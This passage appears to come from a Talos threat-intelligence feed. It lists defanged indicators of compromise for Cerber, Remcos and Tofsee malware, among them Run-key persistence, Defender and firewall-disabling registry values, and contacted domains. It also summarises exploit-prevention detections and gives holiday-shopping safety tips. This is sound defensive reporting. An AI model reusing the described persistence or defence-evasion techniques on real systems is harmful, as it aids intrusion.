                %HOMEPATH%\My Documents\MSDCSC\msdcsc.exe2
                %HOMEPATH%\Documents\MSDCSC2
                %HOMEPATH%\Documents\MSDCSC\msdcsc.exe2
                %TEMP%\RESIM 1.PNG1
                %TEMP%\~PI26.tmp1
                %TEMP%\~PI85.tmp1

                File Hashes

                0316a484966a555a7e369cf49423da28c7cba45bb38d031386ad1e98c7730ed0 30d81a3c924535f64ebb60ffb7c96df278144ec422ea2f7b1905790d2c876619 3a44d9ae2b5508869df06bbf3dc0750f8e4cd8a7a827c95cd24f98966bbbfa38 48d15953b1c2f1e314a6ae3945ccbfd9b3e0fe2d40eea09c8d5f379b07f70866 5027bea06d7037f478ddcfd932cc82f682612e147f00d34d47cbf644453b74df 6289734ecf82dc9496402d9ceae7308819c4bbbb5d85642e8dc5108e8a08c32f 65e95281868c80b645d0276515b8b54fab52fe031a85b96c3e1d29148546bcb4 6c6483db05cbc3e863e3231405f66bc764930e5348800780d50bd1ccf1f869c4 74d2e08ab92859332efc3f97c0ef872979820527cc994c3d4160dd2da4add8e7 a44d66aebc02d8d612038c33bd397bf64097da98676b49315c74b79dd449b142 a7c7b756104d1a98a9daa80a7a591dab8cd210be1cf4a187363e42c23abc5856 be324c43b4b0a4f607e60db1926f4eca349fbb2fb6250da3337f7e94d1ea66c8 f43789df8769817412591e561390f06f9ae94b8047b0afd5b5c74170109729e8 f93f80520ccbba8fa35deb75f50ceba2f54b1ef52589b0c072248786bcef78b0 fa45ff72c498d1af84a96317ecb71a96bd608799d529ae8334d83928dff7b970

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WSA N/A

                Screenshots of Detection

                AMP




                Win.Ransomware.Cerber-7395321-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 16
                <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
                Value Name: PendingFileRenameOperations
                16
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: api-PQEC
                5
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 5
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
                3
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
                3
                <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                Value Name: Client
                3
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                Value Name: AntiVirusOverride
                2
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                Value Name: AntiVirusDisableNotify
                2
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                Value Name: FirewallDisableNotify
                2
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                Value Name: FirewallOverride
                2
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                Value Name: UpdatesDisableNotify
                2
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                Value Name: UacDisableNotify
                2
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                Value Name: EnableLUA
                2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
                Value Name: EnableFirewall
                2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
                Value Name: DoNotAllowExceptions
                2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
                Value Name: DisableNotifications
                2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
                Value Name: Start
                2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
                Value Name: Start
                2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
                Value Name: Start
                2
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION
                Value Name: jfghdug_ooetvtgk
                2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: JudCsgdy
                2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
                Value Name: Start
                2
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Windows Defender
                2
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
                Value Name: Userinit
                2
                MutexesOccurrences
                shell.{381828AA-8B28-3374-1B67-35680555C5EF}16
                shell.{<random GUID>}11
                {<random GUID>}5
                Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}3
                Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}3
                Local\{B1443895-5CF6-0B1E-EE75-506F02798413}3
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                178[.]128[.]255[.]17916
                178[.]33[.]158[.]0/2716
                178[.]33[.]159[.]0/2716
                178[.]33[.]160[.]0/2516
                104[.]24[.]104[.]25413
                104[.]24[.]105[.]25411
                34[.]206[.]50[.]2288
                54[.]164[.]0[.]556
                208[.]67[.]222[.]2223
                172[.]217[.]7[.]2062
                86[.]105[.]1[.]112
                172[.]217[.]11[.]461
                46[.]165[.]221[.]1541
                91[.]195[.]240[.]131
                195[.]201[.]179[.]2071
                192[.]3[.]8[.]2181
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                api[.]blockcypher[.]com16
                bitaps[.]com16
                chain[.]so16
                btc[.]blockr[.]io16
                bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com11
                resolver1[.]opendns[.]com3
                222[.]222[.]67[.]208[.]in-addr[.]arpa3
                myip[.]opendns[.]com3
                wdwefwefwwfewdefewfwefw[.]onion2
                ahrkvtgc[.]com1
                fhvkufnnrlyfvx[.]com1
                shebkucvrunporc[.]com1
                hd63ueor8473y[.]com1
                qegdtnvuanlyid[.]com1
                gcijrxipe[.]com1
                ogltynjmtfiu[.]com1
                rlkeqcsygmmglv[.]com1
                wglxvkpybhnxhfv[.]com1
                aynycxbgodmwi[.]com1
                uahvwkjphhklqigod[.]com1
                en[.]voltster12v[.]com1
                cloud[.]pathwaystopromise[.]info1
                Files and or directories createdOccurrences
                %TEMP%\d19ab98916
                %TEMP%\d19ab989\4710.tmp16
                %TEMP%\d19ab989\a35f.tmp16
                %TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp16
                %TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp16
                <dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt16
                <dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta16
                <dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy)11

                File Hashes

                00fd6d5030b6f36f2acef17f933bf87a5e83104e86edc18467318362fe41bda0 0db052f343bb2c323603fd34eea55262f5448450feaf0dbb03e77da1d1da204e 1beb4d8646023322d8eefba6bee5d899f375bd099050367e8af5321eda512db5 1e78866a82b6016b280f4935ab6aa8e6d59456c5fdb4900ef456cb6216fba878 2766aa41ce912acac61bc342873b1d016c016780600846b77ccee98eaea0a0c1 316c4f6ce0478622772c16aa1821297569a27d52a8ab65262bc1702e864d3cff 367afe107f332d7fd9676b75a76624a2378758104316278a28984ba1815073b2 36bee89b83bc3b628abb726b4530a7fda8b86448594543532ec303f659cd1c1d 36f70b90e9ef4c34440e13c064d05dc0996debd74a7361109532bfda65108ab6 382d8c432cf11339a41b6c0371a226b7567620c6440b0ebdf7dc1610db4ec3c4 38bc3877ec4f87307ccb3d23dc7ea58b117fccfa1ccba938fa9dcff4bb956fe2 4a2803f8ddf258eb4d41ff15f617307cc6eda54bd4e635b0314c9706cff9007e 4b9c203a3f4a7129d0701c5f3e8266d217c836b497c7acf762ad7f8eab508349 4bf2851749232054a7f08faa294520d3bf372b84eb5d20707add176acb1e9aa6 54852be80e90db1d2550128bdf82028befcdf1340da2a1add061e7f6027eb272 552a32a57b59b7498a79f187d2cbfdf7c797395024392b7f76d7b1fff94fea8b 576a3ddc924aea581818f397bca1fe1a3788f892d81b8a2287c03566bc7e6242 5d2e3adf40ec1ae0f6032213a8bb27be9eaf5ae99a6f09239088e8c47944ed02 7275da6b777a1c5c9392766d7fec3c4f0b07e93af161d11b7da000e6157178b0 73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001 7420f8c4f266ebd29b867ef980309bfe8a1d8845f7683e6f8db734c5812eb5e8 89fc2e256c70fb0235ebb0a9daa3f096ba7722fd06b7b0866a1e87b1ea003f79 a04e9bf2aed6eef853c5a5f2ce6131963cb7cd15971c02e6f2afa18846737e74 a508a738cc8d633613641680ca3a7df98be4fa3d6b8f28a16904ba7aa600b89c ad4a8230c0a8d5deb3d8253ef0e2a9c41531eb1560e538ef8cb1a5ff56e7cb27
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                UmbrellaThis has coverage
                WSAThis has coverage

                Screenshots of Detection

                AMP



                Umbrella




                Malware





                Win.Dropper.Remcos-7395733-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS 24
                <HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\MYIMGAPP 24
                <HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\MYIMGAPP\RECENT FILE LIST 24
                <HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\MYIMGAPP\SETTINGS 24
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Snk
                19
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Snk
                19
                <HKCU>\SOFTWARE\XLR4615DFT-CRBSFT
                Value Name: exepath
                19
                <HKCU>\SOFTWARE\XLR4615DFT-CRBSFT
                Value Name: licence
                19
                <HKCU>\SOFTWARE\XLR4615DFT-CRBSFT 19
                <HKCU>\SOFTWARE\NETWIRE 1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: MServices
                1
                <HKCU>\SOFTWARE\NETWIRE
                Value Name: HostId
                1
                <HKCU>\SOFTWARE\NETWIRE
                Value Name: Install Date
                1
                MutexesOccurrences
                Remcos_Mutex_Inj19
                XLR4615DFT-CRBSFT19
                IMYGdLWM1
                Global\00430b21-08fc-11ea-a007-00501e3ae7b51
                Global\006bff81-08fc-11ea-a007-00501e3ae7b51
                Global\03cef101-08fc-11ea-a007-00501e3ae7b51
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                186[.]170[.]64[.]8517
                186[.]170[.]70[.]1521
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                proyectobasevirtualcol[.]com19
                recuperaciondecartera[.]website1
                Files and or directories createdOccurrences
                %TEMP%\install.vbs19
                %APPDATA%\System3219
                %APPDATA%\System32\Snk.exe19
                %APPDATA%\Runtime319
                %APPDATA%\Runtime3\1627.dat19
                %TEMP%\<random, matching '[a-z]{4,9}'>.exe15
                %TEMP%\8D6B.dmp1
                %TEMP%\8adb_appcompat.txt1
                %APPDATA%\Install1
                %APPDATA%\Install\MServicesNet.exe1

                File Hashes

                01c3ab58c66605c68709c785147dc5be803235222cdbcf535e03ad312a2475bf 04ee0252ab6db7de6c8b774254265037413a9979ac9c492918ea66b45acedf5c 0ab93b4561aefbb2dbaccfcb8dc2a000ba14c10ca1bf8222da5125b948e5116f 1c6a3d4989760e577e07a238dfc81f511c23d1cc1840418af3fb01264cc8a54c 2ac0166d713688697266de2427af824786fd76d5f110e758108f1ae3a7eb6037 48097d2e7e7bb93c4319223a1829239031a1ebbb641a42dcee1b82ada6f8a179 482a3fe73c9fed841695232330c1316472f6f134a6ae65e1f7da61aea4a246bf 70c958e641eee241550a356c0bf81856e3087757471903ee26bb4751d900249d 72cbc8432180fdc6f242e3ce62b80e269d6ead62df1c054e475690c89e3de560 740f6504c165641c9460c853855a586bab05a92ef6d4d4f0435465ea000840b8 7b067dfdd9a77f27b8b16237027c7d159760fb7bbd7effc3663d1d883a50c086 7f5c18605851bc58ef1eba832d3c16f89492ddaeacabee5fa4ad5c8f7402e4bc 843aa842d5d0a8975e8320318960bac3c5356e6e13be3918358e6cb81395e410 8ddc6f9e1435f94e7f8d6aac4cceb7b751b4a70b7e9c11bc46ce81c2fc1efcf5 9808a934240773b0a1cd470d1d87c9f8f54f54bde5801ceae3113677e9378f52 baabcbcd2c97382f2ca9b5786d21f6ed781f5d91cbea916618c0c7aebfcb90b2 bf8938bb97fc959dfaa4fc13d1ca43106e3c0524a626d5778ff7d5d987d9f90e c157967fafed0df923bfa887e443562d13e159eeb0391aa0e4243ec833aacce3 ca2c6609831dc62ed1560aa03b949a897203e62f3dcad833e6abebde6f15232d d643273166b2e97bd4dff80e0f351404f14f2523d713e2f5691e530d94515327 d91f5a063d69697c887a8f0c495c88d699e118fe3367e1b22eb7cf2fcdcabbbe d96399e30a6ae180e5c138453d7c74129e08ab40fa158cf85e0cf7663ed873dc fbb1fed1b420443abadd4d7d091fd448c85a64d2cf8521aa4152277b7821bf0a fc7f4839fea7be50cdb46251be9dbcc6f974232c8eb0e97f2959d99c629f197f

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WSA N/A

                Screenshots of Detection

                AMP




                Win.Dropper.Tofsee-7402230-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                Value Name: Config3
                3
                <HKU>\.DEFAULT\CONTROL PANEL\BUSES 3
                <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                Value Name: Config1
                3
                <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                Value Name: Config2
                3
                <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                Value Name: Config0
                3
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\ibpvucix
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
                Value Name: Type
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
                Value Name: Start
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
                Value Name: ErrorControl
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
                Value Name: DisplayName
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
                Value Name: WOW64
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
                Value Name: ObjectName
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX
                Value Name: Description
                1
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\exlrqyet
                1
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                Value Name: C:\Windows\SysWOW64\nguazhnc
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
                Value Name: Type
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
                Value Name: Start
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
                Value Name: ErrorControl
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
                Value Name: DisplayName
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
                Value Name: WOW64
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
                Value Name: ObjectName
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET
                Value Name: Description
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NGUAZHNC
                Value Name: Type
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NGUAZHNC
                Value Name: Start
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NGUAZHNC
                Value Name: ErrorControl
                1
                MutexesOccurrences
                {37529D08-A67E-40B3-B0F2-EB87331B47F5}9
                Global\<random guid>7
                A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A1
                A238FB802-231ABE6B-F2351354-74D8EB40-AEDEC6C41
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                239[.]255[.]255[.]2503
                69[.]55[.]5[.]2503
                216[.]239[.]36[.]213
                172[.]217[.]12[.]1963
                104[.]47[.]2[.]333
                46[.]4[.]52[.]1093
                43[.]231[.]4[.]73
                213[.]209[.]1[.]1293
                104[.]47[.]1[.]333
                192[.]0[.]47[.]593
                194[.]25[.]134[.]83
                144[.]160[.]235[.]1433
                216[.]40[.]42[.]43
                188[.]125[.]72[.]733
                85[.]114[.]134[.]883
                46[.]28[.]66[.]23
                78[.]31[.]67[.]233
                188[.]165[.]238[.]1503
                93[.]179[.]69[.]1093
                176[.]9[.]114[.]1773
                104[.]47[.]45[.]332
                47[.]43[.]18[.]92
                31[.]13[.]65[.]1742
                192[.]36[.]171[.]2032
                54[.]184[.]154[.]832
                *See JSON for more IOCs
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                250[.]5[.]55[.]69[.]in-addr[.]arpa3
                250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org3
                250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org3
                mta5[.]am0[.]yahoodns[.]net3
                mx-eu[.]mail[.]am0[.]yahoodns[.]net3
                t-online[.]de3
                250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net3
                smtp-in[.]libero[.]it3
                whois[.]iana[.]org3
                libero[.]it3
                250[.]5[.]55[.]69[.]bl[.]spamcop[.]net3
                yahoo[.]co[.]uk3
                whois[.]arin[.]net3
                eur[.]olc[.]protection[.]outlook[.]com3
                250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org3
                hotmail-com[.]olc[.]protection[.]outlook[.]com3
                microsoft-com[.]mail[.]protection[.]outlook[.]com3
                al-ip4-mx-vip1[.]prodigy[.]net3
                mx00[.]t-online[.]de3
                msa[.]hinet[.]net3
                msa-smtp-mx1[.]hinet[.]net3
                irina94[.]rusgirls[.]cn3
                anastasiasweety[.]rugirls[.]cn3
                beautyrus[.]cn3
                ipinfo[.]io2
                *See JSON for more IOCs
                Files and or directories createdOccurrences
                %TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp13
                %TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt13
                %System32%\Tasks\Intel Rapid9
                %APPDATA%\Intel Rapid9
                %APPDATA%\Intel Rapid\IntelRapid.exe9
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnk9
                %HOMEPATH%\Start Menu\Programs\Startup\IntelRapid.lnk7
                %TEMP%\CC4F.tmp7
                %TEMP%\<random, matching '[a-z]{4,9}'>.exe3
                %APPDATA%\Microsoft\Crypto\RyukReadMe.html1
                %APPDATA%\Microsoft\Document Building Blocks\1033\14\RyukReadMe.html1
                %APPDATA%\Microsoft\Document Building Blocks\1033\RyukReadMe.html1
                %APPDATA%\Microsoft\Document Building Blocks\RyukReadMe.html1
                %APPDATA%\Microsoft\Excel\RyukReadMe.html1
                %APPDATA%\Microsoft\HTML Help\RyukReadMe.html1
                %APPDATA%\Microsoft\Internet Explorer\Quick Launch\RyukReadMe.html1
                %APPDATA%\Microsoft\Internet Explorer\RyukReadMe.html1
                %APPDATA%\Microsoft\Internet Explorer\UserData\RyukReadMe.html1
                %APPDATA%\Microsoft\MMC\RyukReadMe.html1
                %APPDATA%\Microsoft\Office\Recent\RyukReadMe.html1
                %APPDATA%\Microsoft\Office\RyukReadMe.html1
                %APPDATA%\Microsoft\Outlook\RyukReadMe.html1
                %APPDATA%\Microsoft\PowerPoint\RyukReadMe.html1
                %APPDATA%\Microsoft\Proof\RyukReadMe.html1
                %APPDATA%\Microsoft\Protect\RyukReadMe.html1
                *See JSON for more IOCs

                File Hashes

                4a893b16147c2cd5df11b1f4df08eddc5505f0aafa9f58747ad0f89d53e65492 4b667f73da0fd2cf8b54efa73239e377c10111fd00e08b9ddaa2adee2a873576 4ee405168c9283d73e2ee5913b2c817b824c02e62b8af2750865dc9a6b7e1f4a 75504fa32f3c2e6c56120a26f6af451dc0c688cf1a1dcfe3f656152326ac3584 7acf0435afa75bdc00575208f16f21c0dec8c101fbcefe96836af71c4c628158 8909eeaeb9edc9b01bfae72a64e84b4589c1d2161debee40dd2ab5f5f0ec3858 89678ea136df0b80c0bd0620836624ff785540801ca1f5beec5e7ee76755b684 981a0821cf4b4992d07b5d74ec24a490f4dee396f8e05d66e85cf87809676fe6 9cf0bfd67b4f99bf1ba21175ef3803b18dc774772187b6eb0e610cdacf759cad b8068519f39fb924188bb343eead3b327604a5a09dd3f51fe2486b90b85ac17b bc720a574efb5d1a1a14489ca4d970cfe9d430f6001c2be09e4dc53d2c80b5cb c03e1affd3cb95c110e931d5571cd5d6c8464af36ca1ce1a0114cd9c1eeedb21 d0b333bb1d8c6c153f91a3a5116a1f989c7759dc31f09008288aa720c65371b8 d0c67d3e0edfe1e0d835dbe5d6676c906c418877500b60044f91305d8b4b43ca da58160abd6e306350ecb6647095970ea0dcbcddc1a5b6671b8575885482a824 dd684a06a5d8f00f3e2efb903898d5311d844eb460b7a6a2531f05c69ac56cbe eadaf620c2eb15ad86a06b25ec32533e44b011cad86c9c02f4bdfae7c2e76b7e ec912191e42a253522747774e1de1db3a4e9ce30942b5924518599e3e87c94be ee5a58e36602b2dc16dc0dfa3b3152721ae46e8d13efe436ab647fff0d612a63 ef419240c15389367b533f498b688382d14c57f8befdda8ea6cd5393529e1590 f2f7ced6ea5d6924fcff354da88b905fda434d24b9e2ad4c6f4b5bee5d98b448 fac2a73ee76ccc941ea723ebb1e559c194676a7b5663e948a25a31487ff0193a

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                UmbrellaThis has coverage
                WSAThis has coverage

                Screenshots of Detection

                AMP


                Umbrella



                Exploit Prevention

                Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
                CVE-2019-0708 detected - (15989)
                An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
                Excessively long PowerShell command detected - (760)
                A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
                Process hollowing detected - (407)
                Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
                Kovter injection detected - (347)
                A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
                IcedID malware detected - (297)
                IcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections.
                Gamarue malware detected - (183)
                Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
                Installcore adware detected - (104)
                Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
                Dealply adware detected - (60)
                DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
                Emotet malware detected - (45)
                Emotet is a banking Trojan that first appeared in the summer of 2014. It uses Automatic Transfer System (ATS) to steal money from a victim's bank account. The Trojan is distributed through spam that includes a malicious attachment or a link that downloads the Trojan. Emotet uses modules, downloaded by the original Trojan to grab Microsoft Outlook information, modify HTTP/HTTPS traffic and distribute spam. Once executed, it checks for virtual machine processes and injects code into the "Explorer.exe" process. Then it reaches out to its command network to download its modules, each of which can be run without the original loader.
                Special Search Offer adware - (31)
                Special Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware.

                Best practices for staying safe online during the holiday shopping season

                $
                0
                0

                By Jon Munshaw.

                This holiday shopping season, the basics of avoiding a malware infection boils down to: If it sounds too good to be true, it probably is.

                While sometimes retailers do give out small-dollar gift cards, that $500 discount on a new iPhone is probably not real. If it is a scam, it will definitely not help you get your new iPhone 11 Pro Max.

                With Black Friday and Cyber Monday, Talos researchers are hitting radio and television networks to alert customers of what to do to stay safe while shopping online. Common attack vectors this time of year include fake websites, coupons, invoices and more, all designed to get shoppers to click on malicious links that eventually lead to adversaries stealing login, banking or personal information.

                Craig Williams, the director of Talos Outreach, appeared on the nationally syndicated radio show “This Morning with Gordon Deal” and discussed common attacks. One scam he discussed involves adversaries sending a fake check or gift card to a shopper, asking them to act as a “secret shopper.”

                The adversaries have the shopper either verify the in-store money transfer service, like Western Union or MoneyGram, by sending some of the money the shopper received or by purchasing gift cards and sending pictures of them to the adversaries. At this point, the shopper is free to spend the rest of the money on themselves. Eventually, however, the bank realizes that the check is fake and the shopper is left with a massive hole in their bank account. The attackers pocket a nice present from the victim.

                Sound overly complicated? Don’t worry, adversaries are still sticking to their bread-and-butter of malicious emails and ads as well.

                “Simply viewing the [malicious] page is enough to compromise your machine,” Williams said on Deal’s show. “But opening an attachment is obviously very dangerous. Plus there’s fake invoices, fake coupons, links to sites to get a special deal.”

                You can listen to the full show here. Williams’ segment starts around the 8:05 mark.

                Another common technique adversaries use is typo-squatting websites for popular retailers. Appearing on KTVU-TV in California, Talos researcher Matt Valites used the example of Nike. If a shopper wanted to buy some shoes, they would usually go to Nike[.]com. But attackers may try to use strikingly similar URLs, such as Niek[.]com, to trick users into thinking they’re on the real site.

                But when the shopper goes to enter their login information or credit card number to buy something, the attackers just steal their information.

                “Instead of click on [these links], try going directly to the website instead and type in the URL of the website you’re trying to visit,” Valites said. You can view his full segment below.

                Here are some other tips for avoiding holiday shopping scams:

                • Only download apps from trusted and official app stores like the Google Play store and iOS App Store. 
                • Look out for apps that ask for suspicious permissions, such as access to your text messages, contacts, stored passwords and administrative features.
                • Some malicious apps will try to masquerade as a legitimate version of the one you could be searching for. Signs of these apps include poor spelling and grammar in app descriptions and interfaces, lack of high-quality performance and a developer contact that uses a free email service (such as @gmail.com).
                • Avoid clicking on unsolicited emails. Make sure you purposefully subscribed to any marketing emails you receive from retailers before opening it.
                • Use an ad blocker locally on your browser. These will often block any malvertising campaigns that aim to capitalize on shoppers looking for deals.
                • Try to use payment services such as Google Pay, Samsung Pay and Apple Pay. These services use tokenization instead of the “Primary Account Number” (your credit card number), making your transaction more secure.
                • Use complex passwords that are unique, per site. Attackers commonly reuse passwords as a way to compromise multiple accounts with the same username. Use a password locker if you have a hard time creating and remembering secure passwords.
                • Manually type in URLs to sites you want to visit rather than clicking on links. 
                • Use two-factor authentication to log into your email account to avoid unauthorized access.

                Vulnerability Spotlight: Two vulnerabilities in EmbedThis GoAhead

                $
                0
                0

                A Cisco Talos researcher discovered these vulnerabilities. Blog by Jon Munshaw. 

